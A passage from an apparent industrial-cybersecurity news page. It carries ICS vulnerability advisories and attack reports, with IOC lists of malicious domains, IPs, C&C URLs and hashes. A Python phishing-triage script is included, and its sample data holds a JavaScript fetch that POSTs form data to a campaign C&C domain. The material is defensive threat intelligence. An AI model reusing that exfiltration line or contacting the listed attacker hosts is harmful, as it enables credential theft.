CyberICS.github.io

News and publications on cybersecurity in industry

Industrial cybersecurity news


[VULNERABILITY] Rockwell Automation 1734-AENTR Series B and Series C

04/03/2021

Vulnerability affects :
-  1734-AENTR Series B, Versions 4.001 to 4.005, and 5.011 to 5.017
-  1734-AENTR Series C, Versions 6.011 and 6.012

Vulnerability risks:
- unauthorized data modification

Updates are available
See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Schneider Electric EcoStruxure Building Operation (EBO)

04/03/2021

Vulnerability affects :
- WebReports v1.9 - v3.1
- WebStation v2.0 - v3.1
- Enterprise Server installer v1.9 - v3.1
- Enterprise Central installer v2.0 - v3.1

Vulnerability risks:
- unauthorized file uploads
- command execution by a remote user


See the documents below for more information
Sources :
CVE :

[ATTACK] Phishing and information theft campaign targeting many industries

04/03/2021

A new phishing campaign aimed at stealing information is underway in several parts of the world, using the AZORult malware.
The targets observed so far are :
- Oil and gas supply chain industries and international maritime organizations in the Middle East.
- A supplier of commercial refrigerators, a supplier of heavy electrical engineering equipment, a manufacturer of optical components and a provider of intelligent automation solutions in Europe
- An industrial process and factory automation company, a manufacturer of building materials and a transportation services company in Asia
- A U.S. manufacturer of non-slip covers
- An aerospace company in India
- A development company in South Korea
- A service provider to the oil and gas industry in the UAE
- A logistics and transport company in the UAE
- The national oil and gas company of Sri Lanka
- An oil and gas company in China
- Petrochemical and textile companies in China

IOCs are available in the sources.
Sources :

[VULNERABILITY] Hitachi ABB Power Grids Ellipse EAM

02/03/2021

Vulnerability affects :
- Ellipse EAM versions prior to and including 9.0.25

Vulnerability risks:
- hijack a user’s session
- compromise authentication credentials

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation CompactLogix 5370 and ControlLogix 5570 Controllers

02/03/2021

Vulnerability affects :
- Armor Compact GuardLogix 5370 controllers, Versions 33 and prior
- Armor GuardLogix, Safety Controllers, Versions 33 and prior
- CompactLogix 5370 L1 controllers, Versions 33 and prior
- CompactLogix 5370 L2 controllers, Versions 33 and prior
- CompactLogix 5370 L3 controllers, Versions 33 and prior
- Compact GuardLogix 5370 controllers, Versions 33 and prior
- ControlLogix 5570 controllers, Versions 33 and prior

Vulnerability risks:
- denial of service (DoS)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] MB connect line mbCONNECT24, mymbCONNECT24

02/03/2021

Vulnerability affects :
- mymbCONNECT24 v2.6.1 and prior
- mbCONNECT24 v2.6.1 and prior

Vulnerability risks:
- remote code execution (RCE)

See the documents below for more information
Sources :
CVE :

[RESOURCES] TTPs of the KAMACITE group

01/03/2021

Dragos has released a set of TTPs for the KAMACITE activity group.
Network :
- Use of compromised third-party servers addressed directly by IP (little use of domain names)
- Use of phishing (Dragos cites Ukrainian political and financial topics and conferences as lures)
- Password reuse (especially in the latest campaigns in the USA)

Dragos attributes the following events to KAMACITE:
- BlackEnergy2 (2014)
- BlackEnergy3 (2015)
- Initial intrusion handed over to the ELECTRUM group (leading to CRASHOVERRIDE) (2016)
- Intrusion into the German power grid (2017)
- Intrusions into the US electric sector (2019-2020)

Source : https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-kamacite/

More information is available here : 
> https://malpedia.caad.fkie.fraunhofer.de/actor/greyenergy
> https://malpedia.caad.fkie.fraunhofer.de/actor/sandworm
> https://malpedia.caad.fkie.fraunhofer.de/actor/electrum

[ATTACK] Chinese hacker group targets India’s power infrastructure

01/03/2021

Recorded Future reports on a campaign by a China-linked group (attribution by Recorded Future) targeting the Indian electricity sector.
Ten organizations in or close to the power sector were targeted; Recorded Future tracks the group behind the campaign as RedEcho.

IOCs :
ntpc-co.com
websencl.com
ptciocl.com
ubuntumax.com
www.shipcardonlinehelp.com
www.smartdevoe.com
www.astudycarsceu.net
www.indiasunsung.com
ixrails.com
pandorarve.com
indrails.com
escanavupdate.club
railway.sytes.net
modibest.sytes.net
indrra.ddns.net
indianrailway.hopto.org
inraja.ddns.net
railways.hopto.org
101.78.177.227
101.78.177.252
210.92.18.132
218.255.77.52
223.255.151.74
223.255.155.231
223.255.155.235
223.255.155.238
27.255.94.29
27.255.94.21
27.255.92.83
223.255.151.85
101.78.177.242
218.255.77.40
218.255.77.54
223.255.155.243
180.150.226.216
223.255.155.247
223.255.155.252
223.255.155.237
218.255.77.60
Sources :

[VULNERABILITY] PerFact OpenVPN-Client

25/02/2021

Vulnerability affects :
- OpenVPN-Client, Versions 1.4.1.0 and prior

Vulnerability risks:
- remote code execution through a malicious webpage
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Fatek FvDesigner

25/02/2021

Vulnerability affects :
- FvDesigner Version 1.5.76 and prior

Vulnerability risks:
- read/modify information
- execute arbitrary code
- crash the application

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation Logix Controllers

25/02/2021

Vulnerability affects :
Affected Rockwell software:
- RSLogix 5000: Versions 16 through 20
- Studio 5000 Logix Designer: Versions 21 and later

Logix Controllers :
- CompactLogix 1768
- CompactLogix 1769
- CompactLogix 5370
- CompactLogix 5380
- CompactLogix 5480
- ControlLogix 5550
- ControlLogix 5560
- ControlLogix 5570
- ControlLogix 5580
- DriveLogix 5560
- DriveLogix 5730
- DriveLogix 1794-L34
- Compact GuardLogix 5370
- Compact GuardLogix 5380
- GuardLogix 5570
- GuardLogix 5580
- SoftLogix 5800

Vulnerability risks:
- bypass the verification mechanism between the engineering software and the controller, allowing an attacker to modify controller logic or configuration

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ProSoft Technology ICX35

25/02/2021

Vulnerability affects :
- ICX35-HWC-A: Versions 1.9.62 and prior
- ICX35-HWC-E: Versions 1.9.62 and prior

Vulnerability risks:
- Change the current user’s password
- Alter device configurations

See the documents below for more information
Sources :
CVE :

[RESOURCES] Dragos 2020 ICS report

24/02/2021

Here is the report on industrial cybersecurity in 2020 published by Dragos. To summarize the 45 pages:
- Dragos identified 4 new groups targeting ICS (STIBNITE, TALONITE, KAMACITE, VANADINITE)
- Abuse of legitimate (valid) accounts is the most common threat technique observed
- 64% of the ICS security advisories published in 2020 had no patch
- The reuse of third-party libraries in ICS products produced two important vulnerability sets: Ripple20 and AMNESIA:33
- Dragos also looks back at the EKANS ransomware, which hit Honda, Enel and Fresenius Kabi
- The report also covers the PARISITE and MAGNALLIUM groups, which target devices at the edge of ICS environments (VPN, RDP)
- 33% of the published security advisories had no valid CVSS score

Source : https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf

[VULNERABILITY] Advantech BB-ESWGP506-2SFP-T

24/02/2021

Vulnerability affects :
- BB-ESWGP506-2SFP-T industrial ethernet switches: Versions 1.01.09 and prior

Vulnerability risks:
- execute arbitrary code (hard-coded credentials)

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Advantech Spectre RT Industrial Routers

24/02/2021

Vulnerability affects :
- Spectre RT ERT351 firmware Versions 5.1.3 and prior

Vulnerability risks:
- information disclosure
- deletion of files
- remote code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation FactoryTalk Services Platform

24/02/2021

Vulnerability affects :
- FactoryTalk Services Platform Versions 6.10.00 and 6.11.00

Vulnerability risks:
- allow a remote, unauthenticated attacker to create new users in the FactoryTalk Services Platform administration console

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric FA engineering software products

18/02/2021

Vulnerability affects :
  - C Controller module setting and monitoring tool, all versions
  - CPU Module Logging Configuration Tool, all versions
  - CW Configurator, all versions
  - Data Transfer, all versions
  - EZSocket, all versions
  - FR Configurator, all versions
  - FR Configurator SW3, all versions
  - FR Configurator2, all versions
  - GT Designer3 Version1(GOT1000), all versions
  - GT Designer3 Version1(GOT2000), all versions
  - GT SoftGOT1000 Version3, all versions
  - GT SoftGOT2000 Version1, all versions
  - GX Configurator-DP, Versions 7.14Q and prior
  - GX Configurator-QP, all versions
  - GX Developer, all versions
  - GX Explorer, all versions
  - GX IEC Developer, all versions
  - GX LogViewer, all versions
  - GX RemoteService-I, all versions
  - GX Works2, Versions 1.597X and prior
  - GX Works3, Versions 1.070Y and prior
  - M_CommDTM-HART, all versions
  - M_CommDTM-IO-Link, all versions
  - MELFA-Works, all versions
  - MELSEC WinCPU Setting Utility, all versions
  - MELSOFT EM Software Development Kit (EM Configurator), all versions
  - MELSOFT Navigator, all versions
  - MH11 SettingTool Version2, all versions
  - MI Configurator, all versions
  - MT Works2, all versions
  - MX Component, all versions
  - Network Interface Board CC IE Control utility, all versions
  - Network Interface Board CC IE Field Utility, all versions
  - Network Interface Board CC-Link Ver.2 Utility, all versions
  - Network Interface Board MNETH utility, all versions
  - PX Developer, all versions
  - RT ToolBox2, all versions
  - RT ToolBox3, all versions
  - Setting/monitoring tools for the C Controller module, all versions
  - SLMP Data Collector, all versions

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Johnson Controls Metasys Reporting Engine (MRE) Web Services

18/02/2021

Vulnerability affects :
- Metasys Reporting Engine (MRE) Web Services – v2.0
- Metasys Reporting Engine (MRE) Web Services – v2.1

Vulnerability risks:
- remote unauthenticated attacker to access and download arbitrary files from the system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple vulnerabilities in Moxa products

18/02/2021

Vulnerability affects :
  - UC-2100 Series: Moxa Industrial Linux v1.0
  - UC-2100-W Series: Moxa Industrial Linux v1.0
  - UC-3100 Series: Moxa Industrial Linux v1.0
  - UC-5100 Series: Moxa Industrial Linux v1.0
  - UC-8100 Series: Moxa Industrial Linux v1.0
  - UC-8100A-ME-T Series: Moxa Industrial Linux v1.0
  - UC-8100-ME-T Series: Debian 8.x
  - UC-8100-ME-T Series: Moxa Industrial Linux v1.0
  - UC-8200 Series: Moxa Industrial Linux v1.0
  - UC-8410A Series: Debian 8.x
  - UC-8410A Series: Moxa Industrial Linux v1.0
  - UC-8540 Series: Debian 8.x
  - UC-8580 Series: Moxa Industrial Linux v1.0
  - MC-1100 Series: Debian 8.x
  - MC-1100 Series: Debian 9.x
  - MC-1200 Series: Debian 9.x
  - V2201 Series: Debian 9.x
  - V2403 Series: Debian 9.x
  - V2406A Series: Debian 8.x
  - V2406C Series: Debian 7.x
  - V2416A Series: Debian 9.x
  - V2426A Series: Debian 7.x
  - V2616A Series: Debian 7.x
  - DA-681C Series: Debian 7.x
  - DA-681A Series: Debian 9.x
  - DA-682C Series: Debian 8.x
  - DA-720 Series: Debian 9.x
  - DA-820C Series: Debian 8.x
  - MPC-2070 Series: Debian 9.x
  - MPC-2101 Series: Debian 9.x
  - MPC-2120 Series: Debian 9.x
  - MPC-2121 Series: Debian 9.x
  - ioThinx 4530 Series: Firmware Edition 1.3 or lower


Vulnerability risks:
- Privilege escalation

See the documents below for more information
Sources :
CVE :

[RESOURCES] Identification of vulnerabilities in IIoT equipment

17/02/2021

FireEye has published a two-part research write-up on vulnerabilities in the Digi ConnectPort X2e, a gateway used in residential solar installations.
The two parts walk through how FireEye researchers discovered and exploited these vulnerabilities.


Source : https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-one.html
Source : https://www.fireeye.com/blog/threat-research/2021/02/solarcity-exploitation-of-x2e-iot-device-part-two.html


[VULNERABILITY] Rockwell Automation Allen-Bradley Micrologix 1100

16/02/2021

Vulnerability affects :
- Allen-Bradley MicroLogix 1100 revision number 1.0

Vulnerability risks:
- DoS condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Open Design Alliance Drawings SDK

16/02/2021

Vulnerability affects :
- Drawings SDK: All versions prior to 2021.12 (Version 2021.11 is only affected by CVE-2021-25174 and CVE-2021-25173)

Vulnerability risks:
- Code execution
- DoS condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Hamilton-T1

16/02/2021

Vulnerability affects :
-  Hamilton-T1 Ventilator Versions 2.2.3 and prior

Vulnerability risks:
- obtain sensitive information or crash the device through hard-coded credentials and missing XML validation (physical access to the device is required)

See the documents below for more information
Sources :
CVE :

[RESOURCES] FireEye analyzes the TriStation protocol by reverse engineering the TRITON malware

16/02/2021

FireEye has published (in June 2018) a research post on the proprietary TriStation protocol used during the TRITON attack (background on the attack: https://www.cyberark.com/resources/threat-research-blog/anatomy-of-the-triton-malware-attack).
The post details how the TriStation protocol works, as reconstructed from the TRITON malware's own implementation of it.
It explains how the attackers appear to have reverse-engineered an older DLL named "tr1com40.dll" to learn how to talk to the safety controllers, and discusses the limits of such reverse engineering.

Source : https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-triton-and-tristation.html

[VULNERABILITY] Rockwell Automation DriveTools SP and Drives AOP

11/02/2021

Vulnerability affects :
- DriveTools SP v5.13 and below
  - DriveExecutive v5.13 and below
- Drives AOP v4.12 and below (supports Logix Versions v16-v30)


Vulnerability risks:
- privilege escalation
- total loss of device confidentiality, integrity, and availability

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Multiple Embedded TCP/IP stacks

11/02/2021

Vulnerability affects :
    - Nut/Net, Version 5.1 and prior
    - CycloneTCP, Version 1.9.6 and prior
    - NDKTCPIP, Version 2.25 and prior
    - FNET, Version 4.6.3
    - uIP-Contiki-OS (end-of-life [EOL]), Version 3.0 and prior
    - uC/TCP-IP (EOL), Version 3.6.0 and prior
    - uIP-Contiki-NG, Version 4.5 and prior
    - uIP (EOL), Version 1.0 and prior
    - picoTCP-NG, Version 1.7.0 and prior
    - picoTCP (EOL), Version 1.7.0 and prior
    - MPLAB Net, Version 3.6.1 and prior
    - Nucleus NET, All versions prior to Version 5.2
    - Nucleus ReadyStart for ARM, MIPS, and PPC, All versions prior to Version 2012.12

Vulnerability risks:
    - spoof TCP connections
    - cause denial-of-service conditions
    - inject malicious data
    - bypass authentication

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] GE Digital HMI/SCADA iFIX

10/02/2021

Vulnerability affects :
- HMI/SCADA iFIX: Versions 6.1 and prior

Vulnerability risks:
- could allow an attacker to escalate their privileges

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Advantech iView

10/02/2021

Vulnerability affects :
- iView versions prior to v5.7.03.6112

Vulnerability risks:
- may allow an attacker to disclose information, escalate privileges to Administrator, perform an arbitrary file read, and remotely execute commands

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SINEMA Server & SINEC NMS

10/02/2021

Vulnerability affects :
- SINEC NMS: All versions prior to v1.0 SP1 Update 1
- SINEMA Server: All versions prior to v14.0 SP2 Update 2


Vulnerability risks:
- allow arbitrary code execution on an affected system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens RUGGEDCOM ROX II

10/02/2021

Vulnerability affects :
- RUGGEDCOM ROX MX5000: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1400: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1500: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1501: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1510: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1511: All versions prior to v2.14.0
- RUGGEDCOM ROX RX1512: All versions prior to v2.14.0
- RUGGEDCOM ROX RX500: All versions prior to v2.14.0


Vulnerability risks:
- allow the decryption of encrypted content, possible code execution, or cause a system crash, resulting in a denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens TIA Administrator

10/02/2021

Vulnerability affects :
- PCS neo (Administration Console): v3.0
- TIA Portal: v15, v15.1, and v16

Vulnerability risks:
- allow local users to escalate privileges and execute code as a local SYSTEM user

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens JT2Go and Teamcenter Visualization

10/02/2021

Vulnerability affects :
- JT2Go: All versions prior to v13.1.0.1
- Teamcenter Visualization: All versions prior to v13.1.0.1

Vulnerability risks:
- Arbitrary code execution

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SCALANCE W780 and W740

10/02/2021

Vulnerability affects :
- SCALANCE W780 and W740 (IEEE 802.11n) family: All versions prior to v6.3

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SIMARIS configuration

10/02/2021

Vulnerability affects :
- SIMARIS configuration: All versions

Vulnerability risks:
- gain persistence or escalate privileges within the system

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] SIMATIC WinCC Graphics Designer

10/02/2021

Vulnerability affects :
- WinCC Graphics Designer used with the following DCS and SCADA products:
    - SIMATIC PCS 7: All versions
    - SIMATIC WinCC: All versions prior to 7.5 SP2

Vulnerability risks:
- unauthenticated access to protected files

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens DIGSI 4

10/02/2021

Vulnerability affects :
- DIGSI 4: All versions prior to v4.94 SP1 HF 1

Vulnerability risks:
- execute arbitrary code with SYSTEM privileges

See the documents below for more information
Sources :
CVE :

[ATTACK] Attack on a Florida water treatment system

10/02/2021

The attacker raised the sodium hydroxide (lye) dosing setpoint at the water treatment plant of the city of Oldsmar, Florida; an operator watching the HMI noticed the change and reverted it before the water supply was affected.
According to the county sheriff, the attacker gained access through the TeamViewer remote-access software installed on the plant's computers.
Sources :

[VULNERABILITY] Luxion KeyShot

04/02/2021

Vulnerability affects :
- Luxion software
  - KeyShot versions prior to 10.1
  - KeyShot Viewer versions prior to 10.1
  - KeyShot Network Rendering versions prior to 10.1
  - KeyVR versions prior to 10.1


Vulnerability risks:
- arbitrary code execution
- the storing of arbitrary scripts into automatic startup folders

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Horner Automation Cscape

04/02/2021

Vulnerability affects :
- Cscape: All versions prior to 9.90 SP3.5

Vulnerability risks:
- Code execution in the context of the current process

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Hirschmann RSP, RSPE, and OS2 series HSR denial of service vulnerability

03/02/2021

Vulnerability affects :
- Hirschmann HiOS RSP, RSPE, OS2 :
  - 07.0.04 to 07.1.00
  - 08.0.00 to 08.3.xx

Vulnerability risks:
- denial of service

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Rockwell Automation MicroLogix 1400

02/02/2021

Vulnerability affects :
- MicroLogix 1400, All series Version 21.6 and below

Vulnerability risks:
- denial-of-service

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Siemens SIMATIC HMI Comfort Panels & SIMATIC HMI KTP Mobile Panels

02/02/2021

Vulnerability affects :
- SIMATIC HMI Comfort Panel (including SIPLUS variants): All versions before v16 Update 3a
- SIMATIC HMI KTP Mobile Panels: All versions before v16 Update 3a

Vulnerability risks:
- allow a remote attacker to gain full access to the device(s) if the Telnet service is enabled

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] ABB AC500V2 Webserver denial of service vulnerability

02/02/2021

Vulnerability affects :
- The following AC500 V2 products with onboard ethernet are affected :
  - PM554
  - PM556
  - PM564
  - PM566
  - PM572
  - PM573

Vulnerability risks:
- denial of service

See the documents below for more information
Sources :
CVE :

[ATTACK] SUNBURST in industrial environments

27/01/2021

On December 13, 2020, several organizations published analyses of the SolarWinds Orion software supply chain compromise (SUNBURST). According to Kaspersky, 32.4% of the impacted organizations are industrial companies.

TrueSec published a list of potential victims decoded from the backdoor's DGA subdomains; the industry-related entries are (source: TrueSec) :

Decoded internal name   Possible organization (may be inaccurate)        Observed message   First seen
resprod.com             Res Group (renewable energy company)             2nd stage          2020-05-06
te.nz                   TE Connectivity (sensor manufacturer)            2nd stage          2020-05-13
fisherbartoninc.com     The Fisher Barton Group (blade manufacturer)     2nd stage          2020-05-15
ironform.com            Ironform (metal fabrication)                     2nd stage          2020-06-19
mixonhill.com           Mixon Hill (intelligent transportation systems)  Terminate          2020-04-29
bisco.int               Bisco International (adhesives and tapes)        Unknown            2020-04-30
helixwater.org          Helix Water District                             N/A                N/A

Source :


[VULNERABILITY] Fuji Electric Tellus Lite V-Simulator and V-Server Lite

26/01/2021

Vulnerability affects :
- Tellus Lite V-Simulator: Versions prior to v4.0.10.0
- V-Server Lite: Versions prior to v4.0.10.0

Vulnerability risks:
- execute code under the privileges of the application

Patch available :
See the documents below for more information
Sources :
CVE :

[ATTACK] Hacking of a building management system in Mexico

26/01/2021

A group of Iranian attackers compromised the web-exposed building management system (BMS) of the Universidad Autónoma de Ciudad Juárez.

[ATTACK] Email phishing targeting industries

26/01/2021

A phishing campaign targeting several industries has been revealed by the Israeli company OTORIO. The most targeted sectors are construction and energy. The phishing emails, mostly imitating Xerox scan notifications, carry an HTML file as attachment. The HTML file displays a blurred image and a pop-up imitating the Office 365 login style asking for a password. JavaScript in the HTML page sends the entered credentials in a POST request to the attackers' servers. OTORIO also linked this campaign to earlier phishing waves dating back to May 2020 that use the same JavaScript obfuscation and HTML files. The attachment names follow the pattern : scanXEROX-{IP}-{UPPERCASE_STRING_OF_CHARACTERS_SIZE_7}-{IP}.HTM

Distribution of targets by sector :

TTPs provided by OTORIO :

Distribution of victims by country (Source : CyberICS) :

During the analysis, one alias comes up several times : bobychenko. The same alias appears in a YARA rule from August 2018 covering a phishing attempt : https://github.com/Hestat/lw-yara/blob/master/includes/linkedin-phish001.yar

The alias also appears as the author of malicious Word documents submitted to Hybrid Analysis :

Some technical features are worth noting (Source: CyberICS):

Domains associated with this campaign and the IPs they resolve to in DNS :

Domain                  IP 1              IP 2            IP 3
quantityscape[.]xyz     185.212.129.131
sendlivofse[.]xyz       45.88.3.86
urentr[.]xyz            185.212.128.132
shlivemicrosft[.]xyz    45.88.3.86
vintageredwe[.]xyz      45.88.3.70
weworkhard[.]xyz        172.67.214.31     104.31.93.46    104.31.92.46
zixzanwe[.]xyz          45.88.3.70
mtietw[.]xyz            185.212.128.62
justgoturwork[.]xyz     172.67.211.250    104.24.117.51   104.24.116.51
froffisse[.]xyz         45.88.3.37

The 172.67.x and 104.x addresses of weworkhard[.]xyz and justgoturwork[.]xyz are Cloudflare proxy ranges, not the attackers' origin servers, so they should not be blocked by IP.

The domains in the IOCs are hosted on IPs that have also served as C&C or malware-distribution infrastructure. For example, 185.212.129.131 hosted quantityscape[.]xyz and, according to VirusTotal, also distributed malware detected as MSIL/Kryptik.WLD!tr and TR/AD.LokiBot.inpgy. No evidence was found linking the phishing campaign to the distribution of this malware.

The IPs involved belong mainly to AS200313, registered in the Seychelles.

List of registrars used :

CyberICS IOCs :

gfbcqot[.]xyz
emraanrajput[.]net
sahatyah[.]shop

Other suspect domains (Source : CyberICS) :

facturasshigeurl[.]site
ns1.ionlineforyou[.]xyz
ns2.ionlineforyou[.]xyz
serv.ionlineforyou[.]xyz
office365working[.]xyz

OTORIO IOCs C&C domains registered by the attacker

aauths[.]xyz
asklogzswq[.]xyz
bdqopt[.]xyz
drakovexlogz[.]xyz
hrekre[.]xyz
ionlineforyou[.]xyz
itsthebestasajob[.]xyz
khetwexw[.]xyz
livestrde28[.]xyz
loggsofice[.]xyz
manonwork[.]xyz
officeautonow[.]xyz
officednslogsonline[.]xyz
quantityscape[.]xyz
redirectitto[.]xyz
rhbreeef[.]xyz
sendlivofse[.]xyz
shlivemicrosft[.]xyz
synchoilas[.]xyz
urentr[.]xyz
vintageredwe[.]xyz
wegoforyou[.]xyz
weworkhard[.]xyz
workingoni[.]xyz
zixzanwe[.]xyz
mtietw[.]xyz
justgoturwork[.]xyz
froffisse[.]xyz

Recent C&C pages on compromised servers

http://corp.uber24[.]ru/php/go.php
https://aparthotelgeres[.]pt/wp-content/plugins/1/post.php
https://expendiatus[.]xyz/post.php
https://ifultech[.]com/1/post.php
https://www.aascarrierinc[.]com/wp-includes/SimplePie/Decode/HTML/rest.php
https://silverstream-london[.]com/1/post.php
https://actorsstudio.com[.]np/wp-admin/includes/1/post.php
http://365itsos.com[.]au/wp-admin/includes/rent.php
https://www.skyblue-network[.]com/wp-includes/images/go.php
https://www.kayakingfloridakeys[.]com/wp-admin/rent.php
https://easimedic[.]com/1/post.php

HTML Phishing pages SHA-1:

e76eb571068c195444d0e23cbdc35fba19a95e0c
9fc656e03703994d5f144457d020db5b06469abc
79d4464c7325feb38a02726b049d6cce3d747627
44c05f4b2bb0787a9c2fcf7c36e1dab457fbe370
c1ec15c712c29dcac08660fddb0da71e94b3d04a
4933bd2fa4c9a3ea30ac479a738ebcdfb488044f
d098f6473f2f6bfd8e3f2f14dd56adc969e76725
a8e817fa63fe2c5bf0273f63f2267b61ce89de72
37713a64ffd1b126f8a4809e94faf9cd72538974
53c4ccab781d93eb04ff5bcfc01321c11958816c
4f309c3a8d754a3fcdfed611e4f101e6b690ddd5
cccf673f3c9c02f5f9a21346cdc91f78d94c92b3
2ac423a86d94d82cc0ecc3c508aa7a90c27a4b9c
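The two indicators OTORIO describes above (the fixed attachment naming pattern and the JavaScript that POSTs the typed password to one of the listed C&C domains) are easy to turn into a mail-gateway triage check. The script below is an added example and is not OTORIO's or CyberICS's tooling; it assumes that message metadata has already been extracted into plain dicts (`id`, `attachment`, `body`), and the sample messages at the bottom are constructed for illustration, not real captures. The domain list is a subset of the defanged IOCs above.

```python
"""Triage check for the Xerox-themed HTML phishing campaign (added example)."""
import re

# Attachment naming pattern reported by OTORIO:
#   scanXEROX-{IP}-{7 uppercase letters}-{IP}.HTM
_OCTET = r"(?:25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])"
_IPV4 = rf"{_OCTET}(?:\.{_OCTET}){{3}}"
ATTACHMENT_RE = re.compile(rf"^scanXEROX-({_IPV4})-([A-Z]{{7}})-({_IPV4})\.HTM$")

# Subset of the C&C domains published in the IOCs, kept defanged as published.
IOC_DOMAINS_DEFANGED = [
    "quantityscape[.]xyz", "sendlivofse[.]xyz", "shlivemicrosft[.]xyz",
    "weworkhard[.]xyz", "justgoturwork[.]xyz", "ionlineforyou[.]xyz",
    "officeautonow[.]xyz",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator (example[.]com, hxxp://) back into a matchable form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").strip().lower()


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}

# Any http(s) host referenced by the page: fetch(), XMLHttpRequest, form action...
_URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def parse_attachment_name(name: str):
    """Return (ip1, token, ip2) if the name follows the campaign pattern, else None."""
    m = ATTACHMENT_RE.match(name)
    return m.groups() if m else None


def ioc_hosts_in(html: str) -> set:
    """Hosts in the HTML body that are a listed C&C domain or a subdomain of one."""
    hits = set()
    for host in _URL_HOST_RE.findall(html):
        host = host.lower().rstrip(".")
        if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
            hits.add(host)
    return hits


def triage(messages):
    """Flag a message when either indicator fires; keep the reasons for the analyst."""
    findings = []
    for msg in messages:
        reasons = []
        parsed = parse_attachment_name(msg.get("attachment", ""))
        if parsed:
            reasons.append(f"attachment name matches campaign pattern (token {parsed[1]})")
        hosts = ioc_hosts_in(msg.get("body", ""))
        if hosts:
            reasons.append("body posts to C&C domain(s): " + ", ".join(sorted(hosts)))
        findings.append({"id": msg["id"], "quarantine": bool(reasons), "reasons": reasons})
    return findings


# Constructed sample messages (not real captures; IPs are documentation ranges).
SAMPLE_MESSAGES = [
    {"id": "m1", "attachment": "scanXEROX-192.0.2.10-QWERTYU-198.51.100.7.HTM",
     "body": '<script>fetch("https://quantityscape.xyz/post.php",{method:"POST",body:f})</script>'},
    {"id": "m2", "attachment": "invoice_2021-01.pdf",
     "body": '<form action="https://mail.weworkhard.xyz/post.php" method="post">'},
    {"id": "m3", "attachment": "scan_2021.pdf",
     "body": '<a href="https://example.com/report">report</a>'},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_MESSAGES):
        print(finding)
```

The filename check is deliberately case-sensitive and anchored, so a renamed copy such as `scanXEROX-...HTM.exe` does not match and must be caught by other controls; the domain check matches subdomains of the listed C&C domains but not look-alike registrations, which is why the registrar and AS information above is worth pivoting on as well.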

[VULNERABILITY] WAGO M&M Software fdtCONTAINER

22/01/2021

Vulnerability affects :
- fdtCONTAINER component
    - Versions between 3.5.0 and 3.5.20304.x
    - Versions between 3.6.0 and 3.6.20304.x
    - Versions older than 3.5
- fdtCONTAINER application
    - Versions between 4.5.0 and 4.5.20304.x
    - Versions between 4.6.0 and 4.6.20304.x
    - Versions older than 4.5
- dtmINSPECTOR Version 3 (Based on FDT 1.2.x)
- Emerson Rosemount Transmitter Interface Software (RTIS) SKUs: 04088-9000-0001, 4088-9000-0002, and 7000003-312
- PEPPERL+FUCHS PACTware 5.0, up to and including Version 5.0.5.31

Vulnerability risks:
- if a user is tricked into loading a manipulated project file, malicious code can be executed without notice

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Mitsubishi Electric MELFA

22/01/2021

Vulnerability affects :
- MELFA robot controllers :
    - MELFA FR Series
        - RV-#FR$%\-D-@ CR800-#V$D
        - RH-#FRH$&\-D-@ CR800-#HD
        - RH-#FRHR$&\-D-@ CR800-#HRD
        - RV-#FR$%\-R-@ R16RTCPU + CR800-#V$R
        - RH-#FRH$&\-R-@ R16RTCPU + CR800-#HR
        - RH-#FRHR$&\-R-@ R16RTCPU + CR800-#HRR
        - RV-#FR$%\-Q-@ Q172DSRCPU + CR800-#V$Q
        - RH-#FRH$&\-Q-@ Q172DSRCPU + CR800-#HQ
        - RH-#FRHR$&\-Q-@ Q172DSRCPU + CR800-#HRQ
    - MELFA CR Series
        - RV-8CRL-D-@ CR800-CVD
        - RH-#CRH$&-D-@ CR800-CHD
    - MELFA ASSISTA: RV-5AS-D-@ CR800-05VD

Vulnerability risks:
- denial-of-service condition

See the documents below for more information
Sources :
CVE :

[VULNERABILITY] Honeywell OPC UA Tunneller

22/01/2021

Vulnerability affects :
